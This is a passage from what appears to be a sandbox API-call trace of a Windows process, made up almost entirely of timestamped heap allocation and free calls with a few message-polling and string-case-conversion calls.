dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.195] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0171.195] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0171.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0171.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0171.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0171.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0171.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 